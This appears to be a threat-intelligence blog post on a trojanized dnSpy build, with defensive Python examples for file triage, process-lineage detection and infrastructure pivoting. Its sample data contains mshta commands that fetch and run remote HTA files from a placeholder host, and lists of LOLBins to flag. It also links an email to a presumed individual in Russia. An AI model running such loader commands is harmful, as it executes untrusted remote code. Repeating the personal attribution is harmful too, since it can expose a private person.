
Fake dnSpy - this bowl of chicken soup is poisoned

Author: Safety Aluanan

"dnSpy" is a popular one for debugging, modifying and decompiling. Tools for .NET programs. Cybersecurity researchers in analysis. Often used when net programs or malware.

On January 8, 2022, BleepingComputer reported that an attacker was using a malicious build of dnSpy to attack security researchers and developers.

@MalwareHunterTeam tweeted the address of a GitHub repository distributing a maliciously compiled version of dnSpy, which goes on to install a clipboard hijacker, Quasar RAT, a mining Trojan and more.
Checking the official dnSpy repository on GitHub shows that the project is archived, stopped receiving updates in 2020, and never had an official website.
The attackers took advantage of this gap: they registered the domain dnspy[.]net and built a polished website to distribute the malicious dnSpy build.
At the same time they bought Google Search ads so that the site appeared at the top of search results, widening its reach.
As of January 9, 2022, the site was offline.

Sample analysis

The dnSpy served from dnspy[.]net is a modified version of dnSpy 6.1.8, which is also the last version officially released.

The attacker achieves infection by modifying the entry code of dnSpy.dll, one of dnSpy's core modules.

Compared with the normal entry function of dnSpy.dll, the modified entry adds code that loads a second executable directly from memory. That embedded program is named dnSpy Reader and is obfuscated.
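A quick static triage for this kind of tampering, as an added example (not code from the original post or from the dnSpy project): it scans a module for a second PE image embedded inside the file, which is what a memory loader needs, and for loader strings stored either as ASCII or as the UTF-16LE that .NET user strings use. The SUSPICIOUS list and the sample bytes are constructed for illustration; the "MZ"/e_lfanew/"PE\0\0" layout it checks is the standard PE header layout.

```python
"""Static triage of a suspected trojanized dnSpy module (added example).

Not code from the original post or the dnSpy project. It checks a .NET
module for the two indicators described above: a second executable
embedded inside the file (ready to be loaded from memory) and strings that
point at a second-stage loader. SUSPICIOUS and the sample bytes below are
constructed for illustration.
"""
import re
import struct
import sys

# Strings a trojanized loader tends to carry. .NET user strings are stored
# as UTF-16LE, so both encodings are searched.
SUSPICIOUS = ["mshta", "dnSpy Reader", "powershell"]


def find_embedded_pe(data: bytes, skip_host: bool = True) -> list:
    """Return file offsets of PE images found inside `data`.

    A PE image starts with 'MZ', and the DOS header stores at offset 0x3C the
    distance to the PE signature. Offset 0 is the host file itself and is
    dropped when skip_host is True, so only embedded images remain.
    """
    hits = []
    for m in re.finditer(b"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            break  # offsets ascend; no later candidate has a full DOS header
        e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
        sig = off + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and data[sig:sig + 4] == b"PE\0\0":
            hits.append(off)
    if skip_host and hits and hits[0] == 0:
        hits = hits[1:]
    return hits


def find_strings(data: bytes, needles) -> list:
    """Return the needles present in `data` as ASCII or UTF-16LE, sorted."""
    return sorted(s for s in needles
                  if s.encode("ascii") in data or s.encode("utf-16-le") in data)


def triage(data: bytes) -> dict:
    return {"embedded_pe": find_embedded_pe(data),
            "strings": find_strings(data, SUSPICIOUS)}


def make_fake_pe(payload: bytes = b"") -> bytes:
    """Build a minimal PE-shaped blob (constructed test data, not a real PE)."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)          # 64-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x80)         # e_lfanew -> 0x80
    hdr += b"\0" * (0x80 - len(hdr)) + b"PE\0\0" + b"\0" * 0x40
    return bytes(hdr) + payload


# Constructed samples: a clean module, and one carrying an embedded PE plus
# loader strings, mimicking the modified dnSpy.dll described above.
CLEAN = make_fake_pe(b"ordinary dnSpy code")
TROJANIZED = make_fake_pe(
    b"prefix"
    + "dnSpy Reader".encode("utf-16-le")
    + make_fake_pe(b"mshta http://example.invalid/stage2.hta"))

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else TROJANIZED
    print(triage(blob))
```

Run it as `python triage.py dnSpy.dll` against a downloaded build; an embedded PE offset is a strong signal on its own, while the string hits are only a hint because legitimate tools may also mention PowerShell.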

It then uses mshta to deliver further payloads: miners, clipboard hijackers, RATs and so on.
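The mshta stage leaves a clear process-lineage trace, and the following added example (not code from the original post) shows a detection over process-creation events with Sysmon Event ID 1 style fields. The events are constructed JSON lines, the URL is a placeholder, and the watched parent names are an assumption. The rule keys on the child being a living-off-the-land binary rather than on dnSpy spawning anything at all, because a debugger legitimately launches the programs it debugs.

```python
"""Process-lineage detection for the mshta stage (added example).

Not code from the original post. It scans process-creation events (Sysmon
Event ID 1 style fields, here as constructed JSON lines) and flags a LOLBin
such as mshta.exe whose parent is the dnSpy executable.
"""
import json

# Living-off-the-land binaries worth alerting on when a dev tool spawns them.
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(lines, parents=("dnspy.exe", "dnspy-x86.exe")):
    """Return one alert dict per LOLBin child of a watched parent.

    `parents` is an assumed list of dnSpy executable names.
    """
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("EventID") != 1:
            continue
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent in parents and child in LOLBINS:
            alerts.append({"pid": ev.get("ProcessId"), "parent": parent,
                           "child": child, "cmd": ev.get("CommandLine", "")})
    return alerts


# Constructed sample events; example.invalid is a placeholder, not an IOC.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 1, "ProcessId": 4120,
                "Image": r"C:\Tools\dnSpy\dnSpy.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": "dnSpy.exe"}),
    json.dumps({"EventID": 1, "ProcessId": 4188,
                "Image": r"C:\Windows\System32\mshta.exe",
                "ParentImage": r"C:\Tools\dnSpy\dnSpy.exe",
                "CommandLine": "mshta http://example.invalid/a.hta"}),
    # A debuggee launched by dnSpy: expected behaviour, must not alert.
    json.dumps({"EventID": 1, "ProcessId": 4200,
                "Image": r"C:\Proj\bin\MyApp.exe",
                "ParentImage": r"C:\Tools\dnSpy\dnSpy.exe",
                "CommandLine": "MyApp.exe"}),
    # Network event, not process creation: ignored.
    json.dumps({"EventID": 3, "ProcessId": 4188,
                "Image": r"C:\Windows\System32\mshta.exe"}),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Someone debugging a script host under dnSpy would trip this rule, so treat it as a triage lead and check the command line for a remote .hta before escalating.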

The two GitHub repositories created by the attackers are:

https[:]//github[.]com/carbonblackz/dnSpy

https[:]//github[.]com/isharpdev/dnSpy

The usernames used are isharpdev and carbonblackz. Remember these names; they come up again later.

Expanding the attacker's infrastructure

Analysis of dnspy[.]net turned up several traces that can be used to map out more of the attacker's assets:

dnspy[.]net:

The domain dnspy[.]net was registered on April 14, 2021.

The domain has multiple resolution records, most of them Cloudflare CDN addresses. The historical records, however, show that from December 13, 2021 to January 3, 2022 the domain resolved to 45.32.253[.]0. Unlike the Cloudflare CDN addresses, this IP has only a small number of domains mapped to it.

Querying passive DNS for that IP shows that most of the domains mapped to it look like imitation domains, and most of them are already offline.

Some of these domains are download sites for hacking tools or office software; others appear to be look-alikes of legitimate websites.

Given that dnspy[.]net, the domain disclosed in the incident, fits the same behavior pattern, we suspected these domains are also the attacker's assets and analyzed them further.
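The pivot just described, as an added example (not code from the original post): discard the resolution records that fall inside the CDN's published ranges, keep the remaining origin addresses, and list every other domain that resolved to them. CLOUDFLARE_V4 is an assumed snapshot of Cloudflare's published IPv4 ranges (fetch the current list from cloudflare.com/ips-v4 before relying on it), and HISTORY is constructed: only the dnspy.net rows follow the dates above, the other rows are made-up records for domains named in this post plus one placeholder.

```python
"""Passive-DNS pivot from a CDN-fronted domain to its origin (added example).

Not code from the original post. Given historical A records for a domain, it
drops addresses inside the CDN's ranges, keeps the remaining "origin"
addresses, and lists the other domains that resolved to them.
CLOUDFLARE_V4 is an assumed snapshot; HISTORY is constructed sample data.
"""
import ipaddress

CLOUDFLARE_V4 = [
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
]
CDN_NETS = [ipaddress.ip_network(c) for c in CLOUDFLARE_V4]


def is_cdn(ip: str) -> bool:
    """True when the address sits in one of the CDN ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_NETS)


# (domain, ip, first_seen, last_seen), the shape a PDNS service returns.
# Constructed: only the dnspy.net rows follow the dates given in the post.
HISTORY = [
    ("dnspy.net", "104.21.10.10", "2021-04-20", "2021-12-12"),
    ("dnspy.net", "172.67.5.5", "2021-04-20", "2021-12-12"),
    ("dnspy.net", "45.32.253.0", "2021-12-13", "2022-01-03"),
    ("dnspy.net", "104.21.10.10", "2022-01-04", "2022-01-08"),
    ("combolist.cloud", "45.32.253.0", "2021-09-01", "2021-11-30"),
    ("torfiles.net", "45.32.253.0", "2021-06-01", "2021-12-01"),
    # Unrelated tenant behind the same CDN address: must not be pulled in.
    ("shop.example", "104.21.10.10", "2021-01-01", "2022-01-01"),
]


def origin_ips(history, domain):
    """Non-CDN addresses the domain has resolved to, in record order."""
    seen = []
    for d, ip, *_ in history:
        if d == domain and not is_cdn(ip) and ip not in seen:
            seen.append(ip)
    return seen


def cohosted(history, ip, exclude):
    """Other domains that resolved to the same address."""
    return sorted({d for d, i, *_ in history if i == ip and d != exclude})


def pivot(history, domain):
    """Map each origin IP of `domain` to the domains sharing it."""
    return {ip: cohosted(history, ip, domain)
            for ip in origin_ips(history, domain)}


if __name__ == "__main__":
    print(pivot(HISTORY, "dnspy.net"))
```

The CDN filter is what makes the pivot meaningful: shop.example shares a Cloudflare address with dnspy.net and is correctly ignored, while the short-lived origin address yields the co-hosted domains worth investigating.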

Take database[.]co, for example. Historically the site was a hacking tool download site, and the archive password for the tool on its home page was "CarbonBlackz", the same name as one of the GitHub users who uploaded the malicious dnSpy.

The site's later page is titled Combolist-Cloud, matching the combolist.cloud domain that also appears in the resolution records of 45.32.253[.]0; some files are distributed via mediafire or gofile.

That domain appears to be an imitation of combolist[.]top, a forum that offers leaked data.

torfiles[.]net is also a software download site.

windows-software[.]co and windows-softeware[.]net are download sites built from the same template.

shortbase[.]net shows the same CyberPanel installation page as dnspy[.]net, dated December 19, 2021. The Wayback Machine's record of dnspy[.]net captures that same CyberPanel installation page.

coolmint[.]net is also a download site and was still reachable as of January 12, 2022, but its download links merely redirect to mega[.]nz.

filesr[.]net and toolbase[.]co are built from the same template.
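Several of the sites above (windows-software[.]co and windows-softeware[.]net, filesr[.]net and toolbase[.]co) were spotted as sharing a template. The following added example (not code from the original post) turns that observation into a repeatable check: it hashes each page's tag skeleton (tag names plus class attributes, visible text stripped) and groups domains whose skeletons match. The PAGES dict is constructed HTML standing in for fetched home pages, not the real sites' markup.

```python
"""Clustering sites by page template (added example).

Not code from the original post. A fingerprint of each page's tag structure
groups sites built from one template even when names and visible text
differ. PAGES is constructed HTML, not the real sites' markup.
"""
import hashlib
from html.parser import HTMLParser


class Skeleton(HTMLParser):
    """Collects the sequence of start tags, each with its class attribute."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        cls = dict(attrs).get("class")
        self.tags.append(f"{tag}.{cls}" if cls else tag)


def fingerprint(html: str) -> str:
    """Short hash of the page's structural skeleton (text content ignored)."""
    parser = Skeleton()
    parser.feed(html)
    return hashlib.sha256("|".join(parser.tags).encode()).hexdigest()[:16]


def cluster(pages: dict) -> list:
    """Sorted groups of domains whose pages share a template."""
    groups = {}
    for domain, html in pages.items():
        groups.setdefault(fingerprint(html), []).append(domain)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


# Constructed stand-ins for the fetched home pages.
TEMPLATE = ("<html><head><title>{t}</title></head><body>"
            "<div class='hero'><h1>{t}</h1></div>"
            "<ul class='apps'><li><a href='/dl'>{a}</a></li></ul>"
            "<footer>{f}</footer></body></html>")
PAGES = {
    "windows-software.co": TEMPLATE.format(t="Windows Software", a="Office",
                                           f="Contact"),
    "windows-softeware.net": TEMPLATE.format(t="Free Windows Apps",
                                             a="Visual Studio", f="About"),
    "unrelated.example": ("<html><body><table><tr><td>Index of /</td></tr>"
                          "</table></body></html>"),
}

if __name__ == "__main__":
    print(cluster(PAGES))
```

Tag skeletons are deliberately strict; for templates that differ by a few injected ads or widgets, compare the skeletons with a similarity ratio instead of an exact hash.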

The About Us page of this site was never customized: its content is copied from the About Us page of FileCR[.]com.

filesr[.]net distributed its software via Dropbox, but the links are now dead.

Finally, zippyfiles[.]net is a hacking tool download site.

We also found a Reddit user named tuki1986 who had been promoting toolbase[.]co and zippyfiles[.]net two months earlier.

A year earlier the same user was promoting bigwarez[.]net.

The site's history shows it is also a tool download site, with several social media accounts tied to it:

Twitter: @Bigwarez2

[email protected]


That account now promotes itools[.]digital, a browser plug-in download site.

Facebook group: @free.software.bigwarez

LinkedIn (currently inaccessible): @free-software-1055261b9

Tumblr: @bigwarez

Continuing through tuki1986's posts, another site, blackos[.]net, turned up.

It is likewise a hacking tool download site, and a threat intelligence platform flags it as distributing backdoored software.

Through that site we found a user named Sadoutlook1992 who has been posting hacking tools on various hacking forums since 2018.

In their latest post, the download link points to zippyfiles[.]net.

The malicious GitHub repository and the archive password both gave us the username "CarbonBlackz". Searching for it shows that the data-breach site Raidforums[.]com has a user named "Carbonblackz".

Accounts with the same name are also registered on Russian-language underground (black and gray market) forums; none of them has posted or replied, so they were apparently never put to use.

The same persona also posted software download links on Vietnam's largest forum.

Looking at the WHOIS records for these domains, the registrant contact email for filesr[.]net is [email protected].

Searching on that mailbox links it to a 35-year-old person believed to be in Russia.

Judging from the two IDs carbon1986 and tuki1986, 1986 is likely a birth year, which matches the age of 35.

Based on the links between these domains, their shared behavior patterns and their similar promotion methods, we believe they belong to the same group as the operators of dnspy[.]net.

This is a well-organized malicious operation active since at least October 2018. It registers large numbers of websites offering hacking tools and cracked software, promotes them across multiple social media platforms, and thereby infects hackers, security researchers, software developers and others with miners, cryptocurrency stealers and data-stealing RATs.

Conclusion

Trojanized cracked software is nothing new, but security researchers are easier targets than most: hacking and analysis tools often trigger antivirus because of their sensitive behavior, so some researchers disable antivirus to avoid the nagging warnings.

Although most of the malicious websites, GitHub repositories and links used to distribute this malware are now offline, security researchers and developers should remain vigilant.

Run any cracked or leaked hacking tool only inside a virtual machine; download development and office software from the official website or other formal channels, and use genuine versions to avoid unnecessary losses.

- END -